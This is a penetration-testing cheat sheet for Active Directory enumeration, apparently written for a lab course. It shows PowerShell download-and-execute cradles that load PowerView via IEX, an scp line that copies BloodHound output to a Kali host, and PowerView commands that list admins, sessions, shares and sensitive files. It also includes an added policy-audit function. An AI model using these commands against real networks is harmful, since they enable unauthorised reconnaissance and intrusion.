# AD Enumeration

## File transfer

### Linux to Windows

{% code overflow="wrap" %}

```powershell
# from Linux to Windows
# Local (PowerView served from a host you control)
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
# Remote (fetched straight from GitHub)
(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX
```

{% endcode %}

### Windows to Linux

```bash
scp local_file username@hostname_or_ip:/remote/path
# Example
scp 20240830124156_BloodHound.zip kali@10.50.57.149:/var/www/uploads
```

## PowerView Enumeration

### Get current domain

```
Get-NetDomain
```

### Get object of another domain

```
Get-NetDomain -Domain moneycorp.local
```

### Get domain SID for the current domain

```
Get-DomainSID
```

### Get domain policy for the current domain

```
Get-DomainPolicy
(Get-DomainPolicy)."system access"
```

### Get domain policy for another domain

```
(Get-DomainPolicy -domain moneycorp.local)."system access"
(Get-DomainPolicy -domain moneycorp.local)."kerberos policy"
(Get-DomainPolicy -domain moneycorp.local)."Privilege Rights"
# OR
(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
(Get-DomainPolicy)."SystemAccess" #Password policy
(Get-DomainPolicy).PrivilegeRights #Check your privileges
```
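A worked example added here (it is not from the original page or from PowerView itself): it wraps the `(Get-DomainPolicy).SystemAccess` and `.KerberosPolicy` lookups above into a function that compares the domain's password and Kerberos settings against a hardening baseline and reports the gaps. It assumes the dev branch of PowerView is loaded (where `Get-DomainPolicy` returns `SystemAccess` and `KerberosPolicy` objects keyed by the GptTmpl.inf names) and that the baseline thresholds are illustrative values chosen for the example, not an official standard.

```powershell
# Added example: audit the default domain policy returned by Get-DomainPolicy.
# Assumes PowerView (dev branch) is already loaded via IEX as shown above.
function Test-DomainPasswordPolicy {
    [CmdletBinding()]
    param(
        [string]$Domain,                 # optional: audit another domain
        [int]$MinLength = 14,            # illustrative baseline values
        [int]$MaxLockoutBadCount = 10,
        [int]$MaxTicketAgeHours = 10
    )

    $policy = if ($Domain) { Get-DomainPolicy -Domain $Domain } else { Get-DomainPolicy }
    $sys = $policy.SystemAccess        # [System Access] section of GptTmpl.inf
    $krb = $policy.KerberosPolicy      # [Kerberos Policy] section

    # Values come back as strings from the .inf parser; coerce to int, 0 when absent.
    function ToInt($v) { if ($null -eq $v -or "$v" -eq '') { 0 } else { [int]"$v" } }

    $findings = @()
    if ((ToInt $sys.MinimumPasswordLength) -lt $MinLength) {
        $findings += "MinimumPasswordLength is $($sys.MinimumPasswordLength), baseline is $MinLength"
    }
    if ((ToInt $sys.PasswordComplexity) -ne 1) {
        $findings += "PasswordComplexity is disabled"
    }
    if ((ToInt $sys.ClearTextPassword) -eq 1) {
        $findings += "ClearTextPassword (reversible encryption) is enabled"
    }
    # LockoutBadCount = 0 means accounts never lock out
    $lockout = ToInt $sys.LockoutBadCount
    if ($lockout -eq 0 -or $lockout -gt $MaxLockoutBadCount) {
        $findings += "LockoutBadCount is $lockout (0 = no lockout), baseline is 1-$MaxLockoutBadCount"
    }
    # MaxServiceAge is expressed in minutes in the Kerberos Policy section
    if ((ToInt $krb.MaxServiceAge) -gt ($MaxTicketAgeHours * 60)) {
        $findings += "MaxServiceAge is $($krb.MaxServiceAge) minutes, baseline is $($MaxTicketAgeHours * 60)"
    }

    [pscustomobject]@{
        Domain    = if ($Domain) { $Domain } else { (Get-NetDomain).Name }
        Findings  = $findings
        Compliant = ($findings.Count -eq 0)
    }
}

# Usage: Test-DomainPasswordPolicy | Format-List
```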

### Get domain controllers for the current domain

```
Get-NetDomainController
```

### Get domain controllers for another domain

```
Get-NetDomainController -Domain moneycorp.local
```

### Get a list of users in the current domain

```
Get-NetUser
Get-NetUser -Username student1
```

### Get list of all properties for users in the current domain

```
Get-UserProperty
Get-UserProperty -Properties pwdlastset,logoncount,badpwdcount
Get-UserProperty -Properties logoncount
Get-UserProperty -Properties badpwdcount
```

### Search for a particular string in a user's attributes

```
Find-UserField -SearchField Description -SearchTerm "built"
```

### Get a list of computers in the current domain

```
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
```

### Get all the groups in the current domain

```
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-NetComputer -Domain <targetdomain>   # computers in another domain
```

### Get all groups containing the word "admin" in group name

```
Get-NetGroup *admin*
Get-NetGroup -GroupName *admin*
Get-NetGroup *admin* -FullData
Get-NetGroup -GroupName *admin* -Domain moneycorp.local
```

### Get all the members of the Domain Admins group

```
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
#test the below command
#Get-NetGroupMember -GroupName "Domain Admins" -Properties * | select DistinguishedName,GroupCategory,GroupScope,Name,Members
```

### Get the group membership for a user

```
Get-NetGroup -UserName "student1"
```

### List all the local groups on a machine (needs administrator privs on non-dc machines)

```
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups
```

### Get members of all the local groups on a machine (needs administrator privs on non-dc machines)

```
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse
```

### Get actively logged users on a computer (needs local admin rights on the target)

```
Get-NetLoggedon -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

### Get locally logged users on a computer (needs remote registry on the target - started by default on server OS)

```
Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

### Get the last logged user on a computer (needs administrative rights and remote registry on the target)

```
Get-LastLoggedon -ComputerName <servername>
```

### Find shares on hosts in the current domain

```
Invoke-ShareFinder -Verbose
```

### Find sensitive files on computers in the domain

```
Invoke-FileFinder -Verbose
```

### Get all fileservers of the domain

```powershell
Get-NetFileServer
```

